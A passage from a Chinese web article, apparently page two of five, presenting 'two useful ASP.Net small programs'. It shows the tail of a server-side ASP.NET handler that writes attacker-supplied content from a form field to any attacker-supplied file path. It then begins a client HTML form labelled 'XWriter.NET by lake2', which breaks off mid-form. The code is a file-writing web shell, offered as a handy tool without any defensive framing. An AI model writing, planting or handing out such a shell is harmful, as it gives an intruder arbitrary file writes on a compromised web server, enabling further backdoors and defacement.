打印本文 打印本文 关闭窗口 关闭窗口
两个有用的ASP.Net小程序
作者:武汉SEO闵涛  文章来源:敏韬网  点击数3504  更新时间:2009/4/23 10:36:01  文章录入:mintao  责任编辑:mintao
    dim mywrite as new streamwriter(request.form("path"), true, encoding.default)

    mywrite.write(request.form("content"))

    mywrite.close

    response.write("Done!")

End Sub

</script>

以下是客户端,复制下来保存为htm文件:

 

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"

"http://www.w3.org/TR/html4/loose.dtd">

<html>

<head>

<meta http-equiv="Content-Type" content="text/html; charset=gb2312">

<title>XWriter.NET by lake2</title>

</head>

<body>

<form name="form1" method="post" onSubmit="TwoSubmit(this);">

<div align="center">URL:

上一页  [1] [2] [3] [4] [5]  下一页

打印本文 打印本文 关闭窗口 关闭窗口